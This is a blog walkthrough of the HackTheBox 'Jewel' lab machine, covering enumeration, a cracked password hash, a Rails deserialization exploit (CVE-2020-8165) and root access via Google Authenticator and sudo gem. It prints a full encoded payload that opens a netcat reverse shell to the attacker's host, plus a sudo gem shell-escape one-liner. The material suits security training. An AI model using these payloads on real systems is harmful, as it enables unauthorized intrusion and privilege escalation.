Post

Hackthebox jewel walkthrough

Posted Updated
By Mohamed Magdy Abumuslim - أبومسلم 1 min read

Scanning

Screenshot-from-2021-02-13-17-25-59

We found port 22 for ssh and port 8000,8080 for HTTP where port 8000

Let`s add jewel.htb in our hosts

Screenshot-from-2021-02-13-17-54-04

Enumeration

Port 8000

Screenshot-from-2021-02-13-18-01-04

port 8080

Screenshot-from-2021-02-13-18-01-35

Let`s enumerate the BLOG! Bill Jennifer We found 2 user Bill,Jennifer

Let`s enumerate the REPO Screenshot-from-2021-02-13-18-15-14

After some enumerating i found SQL file “bd.sql” and i got some hashes Screenshot-from-2021-02-13-18-18-20

I cracked Bill hash “spongebob” but couldnt login, lets countinue enumeration Screenshot-from-2021-02-13-18-27-25

User flag

Its using ruby '2.5.5' , lets search for an exploit After searching i found a CVECVE-2020-8165 I tested all the fields and i found that the vulnerable input in updating user fields Payload <blockquote>%04%08o%3A%40ActiveSupport%3A%3ADeprecation%3A%3ADeprecatedInstanceVariableProxy%09%3A%0E%40instanceo%3A%08ERB%08%3A%09%40srcI%22U%60rm+%2Ftmp%2Ff%3Bmkfifo%20%2ftmp%2ff%3bcat%20%2ftmp%2ff%7c%2fbin%2fsh+-i+2%3e%261%7cnc+10.10.XX.XX+9001+%3e%2Ftmp%2ff%60%06%3A%06ET%3A%0E%40filenameI%22%061%06%3B%09T%3A%0C%40linenoi%06%3A%0C%40method%3A%0Bresult%3A%09%40varI%22%0C%40result%06%3B%09T%3A%10%40deprecatorIu%3A%1FActiveSupport%3A%3ADeprecation%00%06%3B%09T</blockquote> Change the ip to your ip web10 cmd2

$ su bill
Password: 
bill@jewel:~$ whoami
bill

The password is "spongebob" we cracked it 
if you remember Let`s upgrade our shell

ssh ssshhs1

Root flag

I listed the directory as 1st step of enumeration and i found Google auth, it look like the admin use 2FA Google-autyh Lets get the secret key and use google auth <img src="https://i.ibb.co/RghXZSW/cmd10.jpg" alt="cmd10" border="0"> <img src="https://i.ibb.co/GTBN0Wz/auth-1.jpg" alt="auth-1" border="0"> <img src="https://i.ibb.co/QcTKwXY/auth-2.jpg" alt="auth-2" border="0"> Lets generate the OTP web14 Lets use the OTP <img src="https://i.ibb.co/MM9SNFy/cmd11.jpg" alt="cmd11" border="0"> Looks like something wrong. This step made my mind blow off , i searched a lot and asked for a nudge at HTB discord server Someone told me its about sync with the victim box, lets see <img src="https://i.ibb.co/PCjNDwg/cmd123.jpg" alt="cmd123" border="0">. <img src="https://i.ibb.co/PCjNDwg/cmd123.jpg" alt="cmd123" border="0"> Timezone is different, lets set our machine to the victim timezone cmd163 cmd1645 Lets try to escalate privilege again <img src="https://i.ibb.co/1M7W8dv/priv.jpg" alt="priv" border="0"> Bam ! its working

sudo gem open -e "/bin/sh -c /bin/sh" rdoc

cmd19

Thanks for reading i hope you enjoyed

HTB
HTB
This post is licensed under CC BY 4.0 by the author.